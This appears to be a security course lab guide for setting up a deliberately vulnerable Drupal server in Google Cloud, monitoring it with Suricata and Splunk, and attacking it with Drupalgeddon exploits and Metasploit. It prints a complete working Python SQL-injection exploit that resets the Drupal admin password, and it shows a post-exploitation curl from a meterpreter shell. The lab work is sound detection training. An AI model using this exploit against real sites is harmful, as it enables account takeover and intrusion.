IR 202: Metasploit & Drupalgeddon (30 pts + 55 extra)


What You Need for This Project

Purpose

Practice using Google Cloud, Suricata, Splunk, Metasploit, and custom exploits in Python and Ruby.

Task 1: Creating a Debian Cloud Server

If you made a Google Cloud Debian server previously, use that.

If you did not, follow these instructions:

ED 200: Google Cloud Linux Server


Task 2: Creating a Drupal Cloud Server

Creating an Image

First, you need to create a disk image from my public image, which is stored on the Google Cloud.

In Google Cloud Platform, on the left side, click "Compute Engine", Images, as shown below.

At the top center of the next page, click "CREATE IMAGE", as shown below.

As shown below, create an image using a Source of "Cloud Storage file" and a Cloud Storage file of:

gs://sams-images/purple1.tar.gz
Click Create. This took 5 minutes when I did it.

When the process finishes, your image appears in the Images list, as shown below.

Creating the Drupal Target Server

At the top left, click "VM instances".

In the top center, click "CREATE INSTANCE".

In the "Boot disk" section, click the Change button, as shown below.

In the "Boot disk" box, on the "Custom images" tab, select purple1, as shown below.

Click Select.

In the Firewall section, allow both HTTP and HTTPS traffic, as shown below.

Click Create.

When your server is created, it appears in the "VM instances" list, as shown below.

Testing Drupal

Find the "External IP" of your target server, as shown in the image above.

In a Web browser, open this URL, replacing the IP address with the correct address of your target server.

http://35.236.41.106
You should see a Drupal page, as shown below. It may take a few minutes for the server to boot up.

Starting Splunk

In the "VM instances" list, on the right side, on the line for your target server, click SSH to open a Terminal.

In the Terminal, execute this command to start Splunk:

sudo /opt/splunk/bin/splunk start
Splunk starts, as shown below.

Starting Suricata

On your Drupal target server, execute these commands:
sudo service suricata stop
sudo rm /var/run/suricata.pid
sudo suricata -D -c /etc/suricata/suricata.yaml -i ens4

Testing Splunk

In a Web browser, open this URL, replacing the IP address with the correct address of your target server.

Note that this page uses port 443, but it does NOT use HTTPS.

http://35.236.41.106:443
You see the Splunk login page, as shown below.

Log in with these credentials:

If you see a message saying your license has expired, log out, log in again, and choose the "Free" license.

You see the Splunk home page, as shown below.

Testing Connectivity

In the "VM instances" list, on the right side, on the line for your Debian attack server, click SSH to open a Terminal.

In the Terminal, execute this command, replacing the IP address with the IP address of your target Drupal server:

ping -c 2 35.236.41.106
You should see replies, as shown below.

Sending Suspicious Traffic

In the "VM instances" list, on the right side, on the line for your Debian attack server, click SSH to open a Terminal.

In the Terminal, execute this command, replacing the IP address with the IP address of your target Drupal server:

curl -A "Hentai" 35.236.41.106
The source code for the main Web page loads, beginning with the HTML code shown below, and scrolling down for a few screens.

Viewing the Suricata Alert in Splunk

In your Splunk page, at the top left, click splunk>

On the left side, click "Search & Reporting".

In the lower center, click the "Data Summary" button.

In the "Data Summary" box, click the Sources tab. Several source files appear, as shown below.

In the "filter" box, enter sur

Several Suricata files appear, as shown below.

Click /var/log/suricata/fast.log.

You see an alert containing "Hentai", as shown below.


Flag IR 202.2: "Hentai" Alert (15 pts)

The flag is the text covered by a green box in the image above. Enter that flag into the scoring engine to record your success.

Task 3: Protecting Your Server

The vulnerable Drupal server will get hacked before long by automated attacks.

To prevent that, we'll configure the Google Cloud firewall to restrict access to only trusted IP addresses.

Finding your Public IP Address

In Google, search for

whats my ip

Your public IP appears, as shown below.

Make a note of it.

Adjusting the Firewall

In the Google Cloud Platform page, in the line for your Drupal server, on the right side, click the three-dot icon, and click "View network details", as shown below.

On the next page, on the left side, click "Firewall rules".

In the list of rules, click default-allow-http, as shown below.

In the "Firewall rule details" page, at the top center, click EDIT.

Adjust the Source IP range to only include the IP of your Drupal attack server, and the public IP of your own computer, as shown below.

At the bottom of the page, click Save.


Flag IR 202.3: Firewall Rule (5 pts)

The flag is the text covered by a green box in the image above. Enter that flag into the scoring engine to record your success.

Task 4: Drupalgeddon Attack

On your Debian attack server, execute this command:
nano dru
Paste in the code from this shown below, which I got from this page: https://github.com/kenorb/drupageddon/blob/master/drupal_7.x_sql_injection_sa-core-2014-005.py
#!/usr/bin/env python
# Drupal 7.x SQL Injection Example for SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
# Original: http://pastebin.com/nDwLFV3v
# Creditz to https://www.reddit.com/user/fyukyuk
#
# Please use it only for testing purposes.

import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
if len(sys.argv) != 4:
  print "host username password"
  print "http://example.com/ admin new_pass"
  sys.exit(1)
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d\'" \
            +user \
            +"'+,+pass+%3d+'" \
            +hash[:55] \
            +"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
print "POST: ", post_data
content = ''
try:
  content = urllib2.urlopen(url=target, data=post_data).read()
except urllib2.HTTPError, err:
  print 'HTTP Error:', err.code

if "mb_strlen() expects parameter 1" in content:
# FIXME: On 6.8 it's showing success, despite it's not.
        print "Success!\nLogin now with user:%s and pass:%s" % (user, password)
else:
        print "Not success!\n"

Save the file with Ctrl+X, Y, Enter.

On your Debian attack server, execute this command:

nano drupalpass.py
Paste in the code from this shown below, which I got from this page: https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
import hashlib

# Calculate a non-truncated Drupal 7 compatible password hash.
# The consumer of these hashes must truncate correctly.

class DrupalHash:

  def __init__(self, stored_hash, password):
    self.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    self.last_hash = self.rehash(stored_hash, password)

  def get_hash(self):
    return self.last_hash

  def password_get_count_log2(self, setting):
    return self.itoa64.index(setting[3])

  def password_crypt(self, algo, password, setting):
    setting = setting[0:12]
    if setting[0] != '$' or setting[2] != '$':
      return False

    count_log2 = self.password_get_count_log2(setting)
    salt = setting[4:12]
    if len(salt) < 8:
      return False
    count = 1 << count_log2

    if algo == 'md5':
      hash_func = hashlib.md5
    elif algo == 'sha512':
      hash_func = hashlib.sha512
    else:
      return False
    hash_str = hash_func(salt + password).digest()
    for c in range(count):
      hash_str = hash_func(hash_str + password).digest()
    output = setting + self.custom64(hash_str)
    return output

  def custom64(self, string, count = 0):
    if count == 0:
      count = len(string)
    output = ''
    i = 0
    itoa64 = self.itoa64
    while 1:
      value = ord(string[i])
      i += 1
      output += itoa64[value & 0x3f]
      if i < count:
        value |= ord(string[i]) << 8
      output += itoa64[(value >> 6) & 0x3f]
      if i >= count:
        break
      i += 1
      if i < count:
        value |= ord(string[i]) << 16
      output += itoa64[(value >> 12) & 0x3f]
      if i >= count:
        break
      i += 1
      output += itoa64[(value >> 18) & 0x3f]
      if i >= count:
        break
    return output

  def rehash(self, stored_hash, password):
    # Drupal 6 compatibility
    if len(stored_hash) == 32 and stored_hash.find('$') == -1:
      return hashlib.md5(password).hexdigest()
      # Drupal 7
    if stored_hash[0:2] == 'U$':
      stored_hash = stored_hash[1:]
      password = hashlib.md5(password).hexdigest()
    hash_type = stored_hash[0:3]
    if hash_type == '$S$':
      hash_str = self.password_crypt('sha512', password, stored_hash)
    elif hash_type == '$H$' or hash_type == '$P$':
      hash_str = self.password_crypt('md5', password, stored_hash)
    else:
      hash_str = False
    return hash_str

Save the file with Ctrl+X, Y, Enter. On your Debian attack server, execute this command to make "dru" executable:

chmod a+x dru
Send some attacks to your target server, as shown below.

Detecting the Attack

In Splunk, find the Suricata alert shown below.


Flag IR 202.4: Drupalgeddon Alert (10 pts)

The flag is the text covered by a green box in the image above. Enter that flag into the scoring engine to record your success.

Task 5: Drupalgeddon 2 Attack (20 pts extra)

On your Debian attack server, use this attack to exploit your target:

https://github.com/dreadlocked/Drupalgeddon2

You will have to install Ruby and resolve a missing dependency.

Attack your target server, as shown below.


Flag IR 202.5: Drupalgeddon 2 Alert (20 pts)

The flag is the text covered by a green box in the image below.


Task 6: Resizing your Disk (5 pts extra)

To add more Splunk modules, we'll need a larger hard disk.

On the purple1 machine, in an SSH session, execute these commands to see the current disk space and begin a proper shutdown:

df -h
sudo halt

If it's taking too long, which it did for me, force a shutdown from the "VM instances" page:

In Google Cloud Platform, on the left side, click "Compute Engine", Disks.

Click on the purple1 disk, and then, at the top, on EDIT.

Cchange the disk size from 10 to 20 GB, as shown below.


Flag IR 202.6: Disk Type (5 pts)

The flag is the text covered by a green box in the image above. Enter that flag into the scoring engine to record your success.

Restarting your Server

In Google Cloud Platform, start the purple1 server.

Run the df -h command and verify that the disk has more space, as shown below.

Restarting Suricata and Splunk

Restart Suricata and Splunk.

Task 7: Adding Splunk Stream (10 pts extra)

Go here:

https://splunkbase.splunk.com/app/1809/

Log in to a Splunk account. Download the splunk-stream_712.tgz file.

At the top left of Splunk, click "splunk>"

At the top left , click the gear icon. The Apps page opens, as shown below.

At the top right, click "Install app from file".

Click "Choose File and browse to the splunk-stream_712.tgz file.

Click Upload.

After a few minutes, you are prompted to restart Splunk. Do that.

Now Splunk has stream data, as shown below.


Flag IR 202.7: Splunk Stream (10 pts extra)

The flag is the text covered by a green box in the image above. Enter that flag into the scoring engine to record your success.

Task 8: Installing Metasploit (10 pts extra)

Install Metasploit on your Debian attack server, as explained here:

https://computingforgeeks.com/how-to-install-metasploit-framework-on-ubuntu-18-04-debian-9/

Execute these commands to start Metasploit and search for drupal attacks:

msfconsole
search drupal
Drupalgeddon and drupalgeddon2 are both available, as shown below.


Flag IR 202.8: Metasploit (10 pts extra)

The flag is the text covered by a green box in the image above. Enter that flag into the scoring engine to record your success.

Task 9: Drupalgeddon via Metasploit (10 pts extra)

Use Metasploit to perform a Drupalgeddon attack, as shown below.

In the meterpreter session, execute these commands:

shell
curl http://ad.samsclass.info
In Splunk, search for
ad.samsclass.info
as shown below.


Flag IR 202.9: Source (10 pts extra)

The flag is the text covered by a green box in the image above. Enter that flag into the scoring engine to record your success.

Posted 4-13-19
Switched to Sam's scoring engine 4-14-19
Scoring engine removed for WCIL 5-20-19
Flag labels improved 8-8-19
Search term for task 7 corrected to "drupal" 8-8-19
Free Splunk license process added 8-8-19
Adapted for CCSF use 8-19-19